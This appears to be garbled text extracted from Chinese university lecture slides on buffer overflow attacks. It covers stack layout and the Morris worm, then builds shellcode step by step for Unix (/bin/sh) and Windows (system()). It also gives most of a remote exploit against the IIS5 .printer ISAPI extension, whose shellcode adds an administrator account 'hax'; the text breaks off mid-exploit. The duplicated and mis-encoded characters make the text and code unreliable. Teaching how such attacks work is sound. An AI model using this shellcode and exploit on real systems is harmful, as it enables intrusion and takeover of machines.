網(wǎng)絡(luò)安全5-緩沖區(qū)溢出攻擊

1、網(wǎng)絡(luò)安全羅羅 敏敏 武漢大學(xué)計算機學(xué)院武漢大學(xué)計算機學(xué)院2第第4章章 拒絕服務(wù)攻擊拒絕服務(wù)攻擊 重點回顧重點回顧l拒絕服務(wù)攻擊概述l拒絕服務(wù)攻擊分類l服務(wù)端口攻擊l電子郵件轟炸l分布式拒絕服務(wù)攻擊DDoS3第第5章章 緩沖區(qū)溢出攻擊緩沖區(qū)溢出攻擊l本章介紹緩沖區(qū)溢出攻擊的原理，通過具體實例分析攻擊UNIX系統(tǒng)和攻擊WINDOWS系統(tǒng)的特點和方法。 4第第5章章 緩沖區(qū)溢出攻擊緩沖區(qū)溢出攻擊l5.1 緩沖區(qū)溢出攻擊的原理l5.2 緩沖區(qū)溢出程序的原理及要素l5.3 攻擊UNIXl5.4 攻擊WINDOWS5 緩沖區(qū)溢出攻擊的原理緩沖區(qū)溢出攻擊的原理l定義l緩沖區(qū)溢出攻擊是一種通過往程序的緩沖區(qū)寫

2、超出其長度的內(nèi)容，造成緩沖區(qū)溢出，從而破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其他預(yù)設(shè)指令，以達到攻擊目的的攻擊方法 第第5 5章章 第第1 1節(jié)節(jié)6 緩沖區(qū)溢出攻擊的原理緩沖區(qū)溢出攻擊的原理lMorrisl1988年，美國康奈爾大學(xué)的計算機科學(xué)系研究生、23歲的莫里斯利用Unix fingered程序不限制輸入長度的漏洞，輸入512個字符后使緩沖器溢出，同時編寫一段特別大的惡意程序能以root（根）身份執(zhí)行，并感染到其他機器上。它造成全世界6000多臺網(wǎng)絡(luò)服務(wù)器癱瘓 第第5 5章章 第第1 1節(jié)節(jié)7 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素l緩沖區(qū)溢出程序的原理 l眾所周知，C語言不進行數(shù)組的

3、邊界檢查 l在許多C語言實現(xiàn)的應(yīng)用程序中，都假定緩沖區(qū)的長度是足夠的，即它的長度肯定大于要拷貝的字符串的長度 事實并非如此事實并非如此第第5 5章章 第第2 2節(jié)節(jié)8 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素l緩沖區(qū)溢出程序的原理 程 序 段 數(shù) 據(jù) 段堆 棧第第5 5章章 第第2 2節(jié)節(jié)9 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素l緩沖區(qū)溢出程序的原理l例 1 void proc(int i) int local；local=i；void main()proc(1)；main：push1call procproc：pushebpmovebp，espsubesp，4moveax

4、，ebp+08movebp-4，eaxaddesp，4popebpret4第第5 5章章 第第2 2節(jié)節(jié)10 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素l緩沖區(qū)溢出程序的原理l例 2void function(char void function(char * *str)str) char buffer16; char buffer16; strcpy(buffer,str); strcpy(buffer,str); void main()void main() int t; int t; char buffer128; char buffer128; for(i=0;i127;i+)

5、for(i=0;i127;i+) bufferi=A bufferi=A； buffer127=0;buffer127=0; function(buffer); function(buffer); printf(This is a testn); printf(This is a testn); 第第5 5章章 第第2 2節(jié)節(jié)11 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素l緩沖區(qū)溢出程序的原理l例 2壓入堆棧中傳遞的參數(shù)返回地址少量存儲單元Buffer 16字節(jié)空間A A0 x41414141.16個A第第5 5章章 第第2 2節(jié)節(jié)12 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素

6、l為了執(zhí)行一段精心準(zhǔn)備的程序，需要4個步驟l準(zhǔn)備一段SHELLCODEl申請一個緩沖區(qū)，并將機器碼填入緩沖區(qū)的低端l估算機器碼在堆棧中的起始位置，并將這個位置寫入緩沖區(qū)的高端l將這個緩沖區(qū)作為系統(tǒng)一個有著緩沖區(qū)溢出錯誤的程序的一個入口參數(shù)，并執(zhí)行這個有錯誤的程序 第第5 5章章 第第2 2節(jié)節(jié)13 緩沖區(qū)溢出程序原理及要素緩沖區(qū)溢出程序原理及要素l關(guān)鍵技術(shù)l在程序的地址空間安排適當(dāng)?shù)拇a l將控制程序轉(zhuǎn)移到攻擊代碼的方式lFunction Pointers lActivation Records lLongjmp buffers l植入碼和流程控制 l可執(zhí)行的地址空間l代碼段/數(shù)據(jù)段/堆棧段l

7、JVM第第5 5章章 第第2 2節(jié)節(jié)14 攻擊攻擊UNIXlUNIX操作系統(tǒng)簡介 lFreeBSD文件系統(tǒng)的路徑組織結(jié)構(gòu) / 根文件系統(tǒng)，用于存儲系統(tǒng)內(nèi)核，啟動管理和其他文件系統(tǒng)的裝載點。/bin 系統(tǒng)啟動時需要的一些通用可執(zhí)行程序。/cdrom 光盤驅(qū)動器的裝載點。/compat 與系統(tǒng)兼容有關(guān)的內(nèi)容，如系統(tǒng)模擬等。/dev 設(shè)備入口點。在UNIX系統(tǒng)上，每個設(shè)備都作為一個文件來看待，這里放著所有系統(tǒng)能夠用到的各個設(shè)備/etc 各種配置文件。非常重要的一個目錄，所有的配置文件（可以看成是WINDOWS的注冊表）包括用戶密碼文檔等存放在這里/mnt 軟盤等其他文件系統(tǒng)的裝載點。/modules

8、 內(nèi)核可裝載模塊。第第5 5章章 第第3 3節(jié)節(jié)15 攻擊攻擊UNIXlUNIX操作系統(tǒng)簡介 l文件系統(tǒng)的路徑組織結(jié)構(gòu)/proc 進程文件系統(tǒng)，存儲指向當(dāng)前活動進程的虛擬內(nèi)存的偽文件。/root root用戶的工作目錄。/sbin 系統(tǒng)可執(zhí)行文件。/stand 獨立執(zhí)行的程序，sysinstall就在這個目錄下。在安裝配置系統(tǒng)時用到/usr 第二個文件系統(tǒng)?；旧鲜呛拖到y(tǒng)核心無關(guān)但又屬于操作系統(tǒng)的一部分的一個目錄，大多數(shù)的應(yīng)用程序，還有各用戶的私有資料存放在這個子系統(tǒng)/usr/bin 與系統(tǒng)啟動無關(guān)的標(biāo)準(zhǔn)應(yīng)用程序。/usr/sbin 系統(tǒng)啟動時不需要使用的一些系統(tǒng)管理程序。 /usr/game

9、s 游戲。/usr/home 用戶目錄。存放各個用戶自己的文件。第第5 5章章 第第3 3節(jié)節(jié)16 攻擊攻擊UNIXlUNIX操作系統(tǒng)簡介 l文件系統(tǒng)的路徑組織結(jié)構(gòu)/usr/include 程序需要的頭文件。/usr/lib 程序需要的庫文件。/usr/libexec 一些不由用戶直接運行的執(zhí)行程序，如ftpd telnetd 等服務(wù)程序 /usr/man 幫助文件 /usr/X11R6 X-Windows系統(tǒng)/usr/X11R6/bin 可執(zhí)行的X-Windows程序/usr/X11R6/include X-Windows程序的頭文件。/usr/X11R6/lib X-Windows程序的庫

10、文件。/usr/X11R6/man X-Windows程序的幫助文件。第第5 5章章 第第3 3節(jié)節(jié)17 攻擊攻擊UNIXlUNIX操作系統(tǒng)簡介 l文件系統(tǒng)的路徑組織結(jié)構(gòu)/usr/share 各種共享的只讀文件，大多數(shù)是一些系統(tǒng)信息，文檔，包括有FreeBSD手冊等。/usr/local 第三個子文件系統(tǒng)，不屬于FreeBSD一部分的其他程序。 /var 存儲經(jīng)常發(fā)生變化的文件，如郵件，日志等。/var/log 系統(tǒng)日志。/var/mail 發(fā)給用戶的信件。/var/spool 緩沖數(shù)據(jù)，如打印數(shù)據(jù)等。/var/tmp 臨時文件。第第5 5章章 第第3 3節(jié)節(jié)18 攻擊攻擊UNIXlUNIX操

11、作系統(tǒng)簡介 lUNIX系統(tǒng)的文件屬性和存取權(quán)限 #ls -la# -rw-rw-rw- 1 root wheel 170 jan 7 19:46 mnk# -rw-r- 1 root wheel 18204 jan 8 20:34 nmap.tar.gz# -rwxr-xr- 1 candy user 1204 may 23 13:00 mysh.sh# drwx- 2 netdemon user 512 may 23 14:23 mydoc|-1-|-2-|-3-|-4-|-5-|-6-|-7-|文件屬性/文件數(shù)量/所有者/所屬組/文件大小/文件修改時間/文件名第第5 5章章 第第3 3節(jié)節(jié)

12、19 攻擊攻擊UNIXlUNIX操作系統(tǒng)簡介 l核與Shell的交互 l啟動l登錄l執(zhí)行命令l退出第第5 5章章 第第3 3節(jié)節(jié)20 攻擊攻擊UNIXlUNIX操作系統(tǒng)簡介 lShell的功能和特點 l命令行解釋l使用保留字l使用Shell元字符(通配符)l可處理程序命令l使用輸入輸出重定向和管道l維護變量l運行環(huán)境控制l支持Shell編程第第5 5章章 第第3 3節(jié)節(jié)21 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫 void main() char *name2；name0 = /bin/sh；name1 = NULL；execve(name0， name， NU

13、LL)；第第5 5章章 第第3 3節(jié)節(jié)22Dump of assembler code for function main：0 x8000130 : pushl %ebp0 x8000131 :movl %esp，%ebp0 x8000133 ： subl $0 x8，%esp0 x8000136 ： movl $0 x80027b8，0 xfffffff8(%ebp)0 x800013d ： movl $0 x0，0 xfffffffc(%ebp)0 x8000144 ： pushl $0 x00 x8000146 ： leal 0 xfffffff8(%ebp)，%eax0 x800014

14、9 ： pushl %eax0 x800014a ： movl 0 xfffffff8(%ebp)，%eax0 x800014d ： pushl %eax0 x800014e ： call 0 x80002bc 0 x8000153 ： addl $0 xc，%esp0 x8000156 ： movl %ebp，%esp0 x8000158 ： popl %ebp0 x8000159 ： ret第第5 5章章 第第3 3節(jié)節(jié)23Dump of assembler code for function _execve：0 x80002bc ： pushl %ebp0 x80002bd ： movl

15、 %esp，%ebp0 x80002bf ： pushl %ebx0 x80002c0 ： movl $0 xb，%eax0 x80002c5 ： movl 0 x8(%ebp)，%ebx0 x80002c8 ： movl 0 xc(%ebp)，%ecx0 x80002cb ： movl 0 x10(%ebp)，%edx0 x80002ce ： int $0 x800 x80002d0 ： movl %eax，%edx0 x80002d2 ： testl %edx，%edx0 x80002d4 ： jnl 0 x80002e6 第第5 5章章 第第3 3節(jié)節(jié)240 x80002d6 ： neg

16、l %edx0 x80002d8 ： pushl %edx0 x80002d9 ： call 0 x8001a34 0 x80002de ： popl %edx0 x80002df ： movl %edx，(%eax)0 x80002e1 ： movl $0 xffffffff，%eax0 x80002e6 ： popl %ebx0 x80002e7 ： movl %ebp，%esp0 x80002e9 ： popl %ebp0 x80002ea ： ret0 x80002eb ： nop第第5 5章章 第第3 3節(jié)節(jié)25 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫

17、 l匯編語言程序leal string，string_addrmovl $0 x0，null_addrmovl $0 xb，%eaxmovl string_addr，%ebxleal string_addr，%ecxleal null_string，%edxint $0 x80stringdb/bin/sh，0string_addrdd0null_addrdd0第第5 5章章 第第3 3節(jié)節(jié)26 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫 l匯編語言程序l相對偏移jmp 0 x20popl esimovb $0 x0，0 x7(%esi)movl %esi，0 x8

18、(%esi)movl $0 x0，0 xC(%esi)movl $0 xb，%eaxmovl %esi，%ebxleal 0 x8(%esi)，%ecxleal 0 xC(%esi)，%edxint $0 x80call -0 x25string db /bin/sh，0 string_addr dd 0null_addr dd 0 第第5 5章章 第第3 3節(jié)節(jié)27 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫 l匯編語言程序l相對偏移 l消除0void main() _asm_(jmp 0 x18/ # 2 bytespopl %esi/ # 1 bytemovl

19、 %esi，0 x8(%esi)/ # 3 bytesxorl %eax，%eax/ # 2 bytesmovb %eax，0 x7(%esi)/ # 3 bytesmovl %eax，0 xc(%esi)/ # 3 bytesmovb $0 xb，%al/ # 2 bytesmovl %esi，%ebx/ # 2 bytesleal 0 x8(%esi)，%ecx/ # 3 bytesleal 0 xc(%esi)，%edx/ # 3 bytesint$0 x80/ # 2 bytescall -0 x2d/ # 5 bytesstring /bin/sh/ # 8 bytes)；第第5 5

20、章章 第第3 3節(jié)節(jié)28 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫 l匯編語言程序l相對偏移 l消除0l機器代碼xebx18x5ex89x76x08x31xc0 x88x46x07x89x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80 xe8xecxffxffxff/bin/sh第第5 5章章 第第3 3節(jié)節(jié)29 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫 l匯編語言程序l相對偏移 l消除0l機器代碼l攻擊程序第第5 5章章 第第3 3節(jié)節(jié)30char shellcode =xebx18x5ex89

21、x76x08x31xc0 x88x46x07x89x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80 xe8xecxffxffxff/bin/sh；char large_string128；void main()char buffer96；int i；long *long_ptr = (long *) large_string； /* long_ptr指向指向largestring的起始地址的起始地址 */for(i=0；i32；i+) *(long_ptr+i)=(int)buffer； /* 用用buffer的地址填充的地址填充long_ptr */fo

22、r(i=0；istrlen(shellcode)；i+) large_stringi=shellcodei； /* 將將ShellCode放在放在large_string*/strcpy(buffer，large_string)； 第第5 5章章 第第3 3節(jié)節(jié)31 攻擊攻擊UNIXl攻擊UNIX實例分析 lShell Code 的編寫 l匯編語言程序l相對偏移 l消除0l機器代碼l攻擊程序lNOP填充/嘗試地址第第5 5章章 第第3 3節(jié)節(jié)32 攻擊攻擊WINDOWSl與UNIX的不同lWINDOWS系統(tǒng)的用戶進程空間是0-2G，操作系統(tǒng)所占的空間為2-4Gl用戶進程的加載位置為：0 x00

23、400000l這個進程的所有指令地址，數(shù)據(jù)地址和堆棧指針都會含有0，那么我們的返回地址就必然含有0第第5 5章章 第第4 4節(jié)節(jié)33 攻擊攻擊WINDOWSl與UNIX的不同lShellcode 的模式lNNNNSSSSAAAAAA lNNNNAAAAAASSSS第第5 5章章 第第4 4節(jié)節(jié)34 攻擊攻擊WINDOWSl攻擊WINDOWS實例分析l編寫Shellcode#include#includetypedef void (*MYPROC)(LPSTR)；int main() HINSTANCE LibHandle； MYPROC ProcAdd； Char dllbuf11=”msvc

24、rt.dll”； Char sysbuf7=”system”； Char cmdbuf16=”； LibHandle=LoadLibrary(dllbuf)； ProcAdd=(MYPROC)GetProcAddess(Libhandle，sysbuf)； (PocAdd)(cmdbuf)； return 0；第第5 5章章 第第4 4節(jié)節(jié)35 攻擊攻擊WINDOWSl攻擊WINDOWS實例分析l編寫Shellcodel匯編程序第第5 5章章 第第4 4節(jié)節(jié)36#include #include void main(void)LoadLibrary(msvcrt.dll);_asmmov es

25、p, ebp/* 把把ebp的內(nèi)容賦值給的內(nèi)容賦值給esp */push ebp/* 保存保存ebp,esp-4 */mov ebp, esp/* 給給ebp賦新值賦新值,作為局部變量的基指針作為局部變量的基指針 */xor edi, edipush edi/* 壓入壓入0,esp-4作用是構(gòu)造字符串的結(jié)尾作用是構(gòu)造字符串的結(jié)尾0字字符。符。*/sub esp, 08h/* 加上上面加上上面,共有共有12個字節(jié)個字節(jié),用來存放用來存放 */mov byte ptrebp - 0ch, 63hmov byte ptrebp - 0bh, 6fh第第5 5章章 第第4 4節(jié)節(jié)37mov byte

26、ptrebp - 0ah, 6dhmov byte ptrebp - 09h, 6Dhmov byte ptrebp - 08h, 61hmov byte ptrebp - 07h, 6ehmov byte ptrebp - 06h, 64hmov byte ptrebp - 05h, 2Ehmov byte ptrebp - 04h, 63hmov byte ptrebp - 03h, 6fhmov byte ptrebp - 02h, 6dh/* 生成串生成串 */lea eax, ebp - 0chpush eax/* 串地址作為參數(shù)入棧串地址作為參數(shù)入棧 */mov eax, 0 x7

27、8019824call eax/* 調(diào)用調(diào)用system */第第5 5章章 第第4 4節(jié)節(jié)38 攻擊攻擊WINDOWSl攻擊WINDOWS實例分析l編寫Shellcodel匯編程序l機器代碼第第5 5章章 第第4 4節(jié)節(jié)39char shellcode=0 x8B，0 xEC，/* mov esp，ebp */0 x55，/* push ebp */0 x8B，0 xEC，0 x0C，/* sub esp，0000000C */0 xB8，0 x63，0 x6F，0 x6d，/* mov eax，6D6D6F63 */ 0 x89，0 x45，0 xF4，/* mov dword ptreb

28、p-0C，eax */0 xB8，0 x61，0 x6E，0 x64，0 x2E，/* mov eax，2E646E61 */0 x89，0 x45，0 xF8，/*mov dword ptrebp-08，eax */0 xB8，0 x63，0 x6F，0 x6D，0 x22，/* mov eax，226D6F63 */0 x89，0 x45，0 xFC，/* mov dword ptrebp-04，eax */0 x33，0 xD2，/* xor edx，edx */0 x88，0 x55，0 xFF，/* mov byte ptrebp-01，dl */0 x8D，0 x45，0 xF4，

29、/* lea eax，dword ptrebp-0C */0 x50，/* push eax */0 xB8，0 x24，0 x98，0 x01，0 x78，/* mov eax，78019824 */oxFF，0 xD0/* call eax */； 第第5 5章章 第第4 4節(jié)節(jié)40 攻擊攻擊WINDOWSl攻擊WINDOWS實例分析l編寫Shellcodel匯編程序l機器代碼l攻擊lWINDOWS 2000 IIS 5 lISAPI msw3prt.dll l攻擊程序第第5 5章章 第第4 4節(jié)節(jié)41#include #include #include #include #include

30、 void usage(void)printf(ncniis-IIS5 Chinese version.printer remote exploitn);printf(Usage:cniisn);exit(1);第第5 5章章 第第4 4節(jié)節(jié)42main(int argc, char *argv)/* 這段Shellcode所做的就是把net user hax hax/add&net localgroup Administrators hax/add壓入堆棧, 然后調(diào)用system()來執(zhí)行上面的命令, 即增添一個管理員帳號hax */unsigned charshellcode =

31、x55x53x8BxECx33xDBx53x83xECx3CxB8x6Ex65x74x20 x89x45xC3xB8x75x73x65x72x89x45xC7xB8x20 x68x61x78x89x45xCBx89x45xCFxB8x20 x2Fx61x64x89x45xD3xB8x64x26x6Ex65x89x45xD7xB8x74x20 x6Cx6Fx89x45xDBxB8x63x61x6Cx67x89x45xDFxB8x72x6Fx75x70 x89x45xE3xB8x20 x41x64x6Dx89x45xE7xB8x69x6Ex69x73x89x45xEBxB8x74x72x61x74

32、x89x45xEFxB8x6Fx72x73x20 x89x45xF3xB8x68x61x78x20 x89x45xF7xB8x2F61x64x64x89x45xFBx8Dx45xC3x50 xB8xADxAAx01x78xFFxD0 x8BxE5x5Bx5Dx03x03x03;第第5 5章章 第第4 4節(jié)節(jié)43charrequest = GET/NULL.printer HTTP/1.0;charsploit857;char*finger;inti, X, sock;unsigned shortserverport = htons(80);struct hostent*nametocheck;

33、struct sockaddr_inserv_addr;struct in_addrattack;WORDwerd;WSADATAwsd;第第5 5章章 第第4 4節(jié)節(jié)44werd = MAKEWORD(2, 0);WSAStartup(werd, &wsd);if(argc h_addr_list0, 4);memcpy(sploit, request, 26);finger = &sploit26;*(finger+) = 0 x0d;*(finger+) = 0 x0a;*(finger+) = H;*(finger+) = o;*(finger+) = s;*(finger+) = t;*(finger+) = :;*(finger+) = ;第第5 5章章 第第4 4節(jié)節(jié)45/* 溢出串放在Host:后面 */for(i = 0; i 268; i+) *(finger+) = (char) 0 x90;*(finger+) = (char) 0 x2a;*(finger+) = (char) 0 xe3;*(finger+) = (char) 0 xe2;*(finger+) = (char) 0 x77;/* 這里就User32.dll(5.0.2180.1)中jmp esp的位置,